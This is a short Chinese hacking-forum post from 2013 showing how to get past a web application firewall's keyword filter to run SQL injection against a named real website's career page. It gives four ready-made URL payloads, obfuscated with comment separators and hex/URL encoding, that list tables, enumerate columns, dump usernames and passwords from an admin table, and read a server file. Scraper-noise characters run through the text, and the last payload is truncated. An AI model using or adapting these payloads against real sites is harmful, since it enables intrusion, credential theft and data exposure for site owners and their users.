中国网络渗透测试联盟

标题: 绕过waf注入 [打印本页]

作者: admin    时间: 2013-3-8 21:51
标题: 绕过waf注入
waf过滤了 union select  from 等关键词
3 Z& |2 P6 @1 O! ^3 o
4 w, u; s* x+ e. B" p% B) U; S
( u- O, g8 M4 |! w, Y4 R; f' j1.列当前库所有表
4 X8 J  q  C% G4 c& bhttp://jyht.co.uk/career.php
" ?  _7 ]9 u: n- P?id=11/**/and/**/1=2/**/%75%6E%69%6F%6E/**/SELECT/**/1,2,3,4,%28%53%45%4C%45%43%54%20%47%52%4F%55%50%5F%43%4F%4E%43%41%54%28%69%2E%54%41%42%4C%45%5F%4E%41%4D%45%2C%30%78%33%43%36%32%37%32%32%46%33%45%29%20%46%52%4F%4D%20%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D%61%2E%54%41%42%4C%45%53%20%41%53%20%69%20%57%48%45%52%45%20%69%2E%54%41%42%4C%45%5F%53%43%48%45%4D%41%20%3D%20%64%61%74%61%62%61%73%65%28%29%29,6,7,8,9,10,11,12,13,14,15,16,17,18
( J4 G2 r9 O* e$ x7 M. f6 K
6 q8 D% W4 L$ S! k3 m9 X/ A- [3 Z2.获取字段
4 G2 D6 z/ g+ E, X$ mhttp://jyht.co.uk/career.php
8 `. m. Z" R% @?id=11/**/and/**/1=2/**/%75%6E%69%6F%6E/**/SELECT/**/1,2,3,4,group_concat(COLUMN_NAME,0x3C2F62723E),6,7,8,9,10,11,12,13,14,15,16,17,18/**/%66%72%6F%6D%20%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D%61%2E%43%4F%4C%55%4D%4E%53%20%77%68%65%72%65%20%54%41%42%4C%45%5F%4E%41%4D%45%3D%30%78%36%44%36%31%36%45%36%31%36%37%36%35%37%32
0 {' L, }  M; \3 ^ 0 a: `9 c) A: h7 T2 {; \+ a
3.直接获取数据7 O$ H2 B, U' g# [+ b2 x
http://jyht.co.uk/career.php
) g$ y( Y3 j8 z  f/ ~5 k?id=11/**/and/**/1=2/**/%75%6E%69%6F%6E/**/SELECT/**/1,2,3,group_concat(id,0x3d,username,0x3d,password,0x3C62722F3E),5,6,7,8,9,10,11,12,13,14,15,16,17,18/**/%66%72%6F%6D/**/%6D%61%6E%61%67%65%72- m7 _7 z% ?5 d6 Z, m$ |

) {/ @9 `9 M$ J' z; ?" W2 n" Y 7 t. Q8 R  `) z% n$ c2 ]" R; I
4.读文件 可以不用hex  直接在页面显示(必须是root)
6 V5 f6 t+ w; m% J5 l# k7 xhttp://jyht.co.uk/career.php
$ w/ d! {% @1 q4 N?id=-11/**//**/%75%6E%69%6F%6E/**/SELECT/**/1,2,3,4,hex(load_file(0x443A5C776562736974655C6A696E797568656E67746F6E675C6A7968742E636F2E756B5C636C6173735C64625F6D7973716C2E636C6173732E70687




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2